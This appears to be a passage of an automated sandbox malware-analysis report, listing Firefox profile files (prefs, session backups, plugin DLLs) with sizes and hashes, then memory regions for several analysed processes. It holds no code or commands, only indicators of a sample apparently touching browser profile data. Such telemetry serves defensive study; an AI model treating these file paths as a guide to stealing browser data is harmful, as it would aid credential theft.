                                                                                                                                                                                                                    5bffd731197bb4debcdc5dd9e5e18e0f2074a8c2

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    428f0f60dc6424f7a7f856d9940e57377f0b8286a7c5ab6dad2e91c7c7808094

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    88da9083acdfa1b2efc154cd4dcd531cb5ea09c6dbf2a5963694a0f7d316c00cab9ac0be32378b70db9964d65467fc617ae184e70742197aca1639906b9f6a3f

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\AlternateServices.bin

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    13KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    2029853a0efbf03f9404960070a66d66

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    139151122a65ca474443373485711c4bf4ff72b4

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    4553d14f45d176921566a3cd9c763398090b6ff28a295e49f4d926fe96c8c0b1

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    2c8e76b9f3ab29dc19244a8e5d0e268bb57d462ef23dc68487b3daae5b54381515d492dca9e7e39a98562be9ef95b3a7f6de89bd0894bd61f9f1d7a8f754e934

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\AlternateServices.bin

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    23KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    a078fb4331558c86ee526f8847a9dd08

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    25ad636e4937e039df69e2c56365e6130a3e4142

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    21d6fe2e16a86c83c0bb6cc697e8c68ac8b60a2f78e426ba9cc89875e9b1ab7e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    1ce8c47318927eff03625de1eb56ad2a7faab9870606a53148be77858041eecfe76b88515eaa58fd42821662acd7d2b3283ea73ec30540d5e599d1f51c1f22d2

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    5KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    3974a79cbdf5fc27bc9ad67159ffac25

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    91f589099e01887d6ebd7a87702aa5d8b35b64c1

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    39d33c41b7877e435817e03768e2a2d111bfd64d1132e39285324cf2cc646f05

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    0ffd3bb3bbeadde54273dd55fcaaf4b529a821c3b43268ae93b4d82f12cbbfa319b58a78c44eb585a6283804ee7b27b3f28432b95c415a0a55ad28d8eeb6eb8d

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    6KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d3878510621a3845b9c253c41431300c

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    0ffb1a3ecbf4cab657cf4f779f23ae3566c78eb1

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    cf0fd079e36609d6bc4c2e01db80a821dd94aff86f86d55065edf8b00064be68

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    5b6d867683f6548b169903b65c6848f07be366adbd1feaa27d2c3127fa1d2ed8bea720aa3ee02570a9ddc913f0b4f2a3aa4f6ee39d57876c550943ea66b86754

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    6KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    612a96946219ff28122426163bfafad7

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    e680633bd23c1d0a8249de9c89260023111e9f6b

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d09e8c93cfbcf765401345de6005d3502b0b09aa0601f7130abd968fe9d6aa89

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f6e8f29e9ccd17914db886f7d5963026d3d1c77fd6b2f5badacb562a4945a784209e387e3c86d9132398a32651b2d827d27009745b50baa6d2cad2ab4229dcbc

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\pending_pings\8a474808-c52a-4e2d-8157-6fdacf689c15

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    671B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    439f2494f2ed0c66afdfa0f91884318a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    25c5e3ac1667a80d4be7d78289b59026962865f6

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    dca8d3ab91060ab414d7420bbfeab7d2c09eea137004ce6daeed1cd4459913a5

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    6f960f03275c03e4e7e32b7ba23b1e9b7b21ffad4c4f3f322266b5eb13aa0cc669ca392c2178eb09962d4b3d84f9ee9ec43ef5d94813293f275808571c98a022

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\pending_pings\909f2c7e-7cb0-4d21-8955-56e0562c324f

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    26KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    dc54ccee4a9cf9dceff7ac940845ccf4

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    ac6ff7fd5ca371c59e6166fd5d6997b36eb3ac44

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    bd67efb0969eab0ab3561826e93edc07b03fc17d2f5d4297bcbb7f2c00e7ee8c

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    cc5f1f393a7da8fd3b1c7e5f9deb0cc1d4fb206fd533acb4d1bb1d496a9a230bbfa0b3fdf627059e3fc9f9323875ed1ed82bd7d211762c73bf1893f5fc9a04d2

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\datareporting\glean\pending_pings\a8caf373-f771-4a29-9b0d-277307b8c5a9

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    982B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    3dd9aad593bcc1b8b3a7a32cd62f34b0

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    69cd93f596fc4e1dd673ab5bc776a21353db7041

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d03ad65369e25acefcdcb95d32dc0bcbc38146320dafaa05c28062a284f68721

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    4ab86507d660accd593a6be7215b9c54061604270a10ddd1e8ea800bd620c8eec753791c285b14e6f13ac845695bee11441f4a48f713e691840733b619836bca

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    842039753bf41fa5e11b3a1383061a87

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    116B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    2a461e9eb87fd1955cea740a3444ee7a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b10755914c713f5a4677494dbe8a686ed458c3c5

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    372B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    bf957ad58b55f64219ab3f793e374316

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    17.8MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    daf7ef3acccab478aaa7d6dc1c60f865

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    f8246162b97ce4a945feced27b6ea114366ff2ad

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\prefs-1.js

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    f687a40cf3ad9fdd181c59eed1ded89b

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    965146f11ee1a52728d9589a10174f0c7b7ee937

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    ffe35c13955b3b40953e34223135e15297d96e9a899c2e740ce3dc7b0c4c5572

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f3e4414d4e40c33458f1f9b71e6ac2af426c11448258f04acd7d8c8da621e68b4a4922dde27da4cca3ca7b467f2e61edfa3c9a968ed96b9caa63735461889a7f

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\prefs-1.js

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    f5603e656c3254e8c5ec4929b0ae80df

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    a05f4febb977e41b648a22aef4df04aa58d000f3

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    da63b843f45ba5e55923f5c9ac824efe79a80cd7f43d4107e8dece3f7ab14a99

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    e1f3f7558e51a8b2bf3b19e7dbfc354ee9672b713a99bd9c4be84e4ab084705f6b718ed2e277da16ad325748b6f1388b7031da24c64c8116d2769dd2b8e72660

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\prefs.js

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    9KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    c16128293b74e637279b2bd84aebd93f

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b4250d552aef3bd6c21230b148b5397c85d9ac8a

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    64815cf0097e036fdbd6236624b9be77bc335721561234267f1611c6befff2d7

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    5f65a09063f96b5e5da85c1d3ba4e792f9cfd7d2596f71a578f578058c165206209f1750d649d6e7dc006e71702400cacf127045acb6868d8a3e4138ceca7a1a

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    bea90919aaf5426ac5daba5b68a09800

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    f93da0572e6a4c3ef03b9855c88bfa8626d13cb7

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    4edc1165e04005d58b2633980494552e1d349ecd9b269b71c1ebebcc02ec013b

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    be86216e5b33e15301f5764811bdcb844502946c3f7850b0fa208f9a4fb1b9beae3f60230fd150aeeac1875c389efd904dc89b56e24139c1ad8a49cdee642efa

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    12KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    4cca08b802362ef6e2f1f0617ce68fe0

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    80eac2dcaf42f70eba1acb75693cd0a79610a93b

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    70619f9aa232a4075c5df2f057891f0c694e39a783dc669359c617b55dcf5031

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    7af2b94b3e68c610de9fbdce5716e23da897a4f55b27ab48c8bd98da7028bc5d5ab83fa8e966cc8227ff856194cf5e050dd9fad3be527b13b1a43c69314ce907

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    12KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    51c9ba9f6436a48540829e09208068e4

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    7e9a9dac85e73aa1ddf3b9d0357f5e63ed9eb107

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    8b434f26035804391e01474639986b25d5c952b4056e1ca999de0405dc69c35d

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    754e395a4d4a6c19485c6227464849caef41b4c469c720b61bf4e8c269f7cd95cd5fde91b908b023114bfba76894e6aa5201c62ba4c48404da4bcf0994f14916

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    13KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    f52c1cae1eb6a923923da912ef3805e8

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    7146b8ead35309f96bf49e90647c62cdb59a1012

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    cf3732f45d27d8ca576983fad7b15cc7a1af2a97375d1107e4406bafcc1cac8a

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    05538afef39a064543e361e355e716f3edc78ae48525b5704a33104cf01d9dece0aab742b3bcd027f157e66de6e278226c9956fbff2f466428c4aec62a75546c

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    93c8188f5fe487362f27056a8c4a07a0

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    64ff94e2e93624a4a2a65e721640ec3b914ad604

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    a252e880b16d4f69ee3d2378ccda04d4e210611dbb36560b13d6f3acc29c5bf9

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9fd97499f3bb0817c15b824dcf84e9b1485367ee8a46cbf935eaf773e8988647f671c932fef11b67bff857c034fe21d1f565b56888cbc81628fc71bfb8990d90

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    12KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    824d5e8cf203430a859006fe528a6e3f

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    ae88959327a088073481ab789b595768784a34f0

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    68ec3c38f4b8d9bc508a021bbc5944ae6be596a37fc285610aba740f06197a3f

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    86a22d9e6ca6ac066f0f451dbff5c70fe0371891bac09110bcb3abdf60e4bd4a70e1323f999cbe6aa6c300532601ef432858b84a08460a34c6b53c6e8ebaa5a6

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    13KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    764939b69314e8881e79d007743ff30a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    d4d5794946fba7d22dc890e0b369be8d3c9de499

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    0351301795ebdc25551e48f3c8f08d131375d5fe22742892ab53c343d18f9bf6

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f6417a95597b25f571995f9b86822a95200acfa85061f9d7334897eebe1c912c2c023c44ae8c78c7b6e17531ac40bf1c1f4760656188e0ecbdd54816adc0ae81

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\56i567ym.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    17KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    817742b3815f806d23263ac487e567c0

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    861f23ad31724793919c5d14a7e291da6865dfc8

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    e0d32b7db21eec888e5c2269f823492419e1121e5ebed1711bc2ed32dc007fcc

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    41b410920158b9c13d4807b58b0a872131e11148ef99583ddc9f7f00b0788e5ba5ede8578f36761be58c834a02cdffb2c03c10841ecc8f313245c0024eccb40b

                                                                                                                                                                                                                  • memory/852-144-0x0000000000570000-0x00000000005CC000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    368KB

                                                                                                                                                                                                                  • memory/1076-2983-0x0000000000690000-0x0000000000B08000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.5MB

                                                                                                                                                                                                                  • memory/1076-1422-0x0000000000690000-0x0000000000B08000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.5MB

                                                                                                                                                                                                                  • memory/1076-1423-0x0000000000690000-0x0000000000B08000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.5MB

                                                                                                                                                                                                                  • memory/1076-1420-0x0000000000690000-0x0000000000B08000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.5MB

                                                                                                                                                                                                                  • memory/1076-1479-0x0000000000690000-0x0000000000B08000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.5MB

                                                                                                                                                                                                                  • memory/1408-819-0x0000000000C10000-0x0000000000C5C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                  • memory/1484-941-0x0000026F34E00000-0x0000026F34E22000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    136KB

                                                                                                                                                                                                                  • memory/1484-1009-0x0000026F34E80000-0x0000026F34ED0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    320KB

                                                                                                                                                                                                                  • memory/1484-1010-0x0000026F34F50000-0x0000026F34FC6000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                  • memory/1484-1013-0x0000026F34E30000-0x0000026F34E4E000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                  • memory/1484-934-0x0000026F34B30000-0x0000026F34BE2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    712KB

                                                                                                                                                                                                                  • memory/1484-933-0x0000026F33D60000-0x0000026F33E40000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    896KB

                                                                                                                                                                                                                  • memory/1556-45-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    380KB

                                                                                                                                                                                                                  • memory/1556-50-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    380KB

                                                                                                                                                                                                                  • memory/1560-1088-0x0000000000E40000-0x000000000128C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.3MB

                                                                                                                                                                                                                  • memory/1560-1220-0x0000000000E40000-0x000000000128C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.3MB

                                                                                                                                                                                                                  • memory/1560-1090-0x0000000000E40000-0x000000000128C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.3MB

                                                                                                                                                                                                                  • memory/1560-1204-0x0000000000E40000-0x000000000128C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.3MB

                                                                                                                                                                                                                  • memory/1560-1091-0x0000000000E40000-0x000000000128C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.3MB

                                                                                                                                                                                                                  • memory/1952-880-0x0000000000E00000-0x00000000012B5000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                  • memory/1952-884-0x0000000000E00000-0x00000000012B5000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                  • memory/2104-770-0x0000000000830000-0x0000000000CE3000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                  • memory/2104-774-0x0000000000830000-0x0000000000CE3000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                  • memory/2696-150-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    380KB

                                                                                                                                                                                                                  • memory/2696-146-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    380KB

                                                                                                                                                                                                                  • memory/2832-41-0x0000000072C1E000-0x0000000072C1F000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2832-42-0x00000000002F0000-0x000000000034C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    368KB

                                                                                                                                                                                                                  • memory/2832-43-0x00000000052C0000-0x0000000005866000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    5.6MB

                                                                                                                                                                                                                  • memory/3244-1211-0x0000000000F20000-0x00000000013E4000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                  • memory/3244-1205-0x0000000000F20000-0x00000000013E4000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                  • memory/3332-858-0x0000000000400000-0x0000000000459000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    356KB

                                                                                                                                                                                                                  • memory/3332-860-0x0000000000400000-0x0000000000459000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    356KB

                                                                                                                                                                                                                  • memory/3376-286-0x0000000007410000-0x00000000074A6000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    600KB

                                                                                                                                                                                                                  • memory/3376-163-0x00000000057E0000-0x0000000005846000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    408KB

                                                                                                                                                                                                                  • memory/3376-242-0x00000000058C0000-0x0000000005C17000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                                  • memory/3376-290-0x00000000074F0000-0x0000000007502000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                  • memory/3376-268-0x0000000005D70000-0x0000000005D8E000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                  • memory/3376-160-0x00000000048F0000-0x0000000004926000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    216KB

                                                                                                                                                                                                                  • memory/3376-281-0x0000000006D50000-0x0000000006D6E000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                  • memory/3376-289-0x0000000007370000-0x0000000007392000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    136KB

                                                                                                                                                                                                                  • memory/3376-291-0x00000000074E0000-0x00000000074EA000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                  • memory/3376-285-0x0000000007170000-0x000000000717A000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                  • memory/3376-283-0x0000000007730000-0x0000000007DAA000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    6.5MB

                                                                                                                                                                                                                  • memory/3376-287-0x00000000072E0000-0x00000000072F1000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    68KB

                                                                                                                                                                                                                  • memory/3376-164-0x0000000005850000-0x00000000058B6000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    408KB

                                                                                                                                                                                                                  • memory/3376-282-0x0000000006DB0000-0x0000000006E54000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    656KB

                                                                                                                                                                                                                  • memory/3376-284-0x00000000070F0000-0x000000000710A000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    104KB

                                                                                                                                                                                                                  • memory/3376-161-0x0000000004FC0000-0x00000000055EA000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    6.2MB

                                                                                                                                                                                                                  • memory/3376-269-0x0000000005E20000-0x0000000005E6C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                  • memory/3376-271-0x0000000006D70000-0x0000000006DA4000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    208KB

                                                                                                                                                                                                                  • memory/3376-272-0x000000006F540000-0x000000006F58C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                  • memory/3376-162-0x0000000004EF0000-0x0000000004F12000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    136KB

                                                                                                                                                                                                                  • memory/3588-1432-0x0000000001000000-0x00000000014D6000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                  • memory/3588-1429-0x0000000001000000-0x00000000014D6000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                  • memory/3792-1390-0x0000000000D60000-0x0000000001201000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.6MB

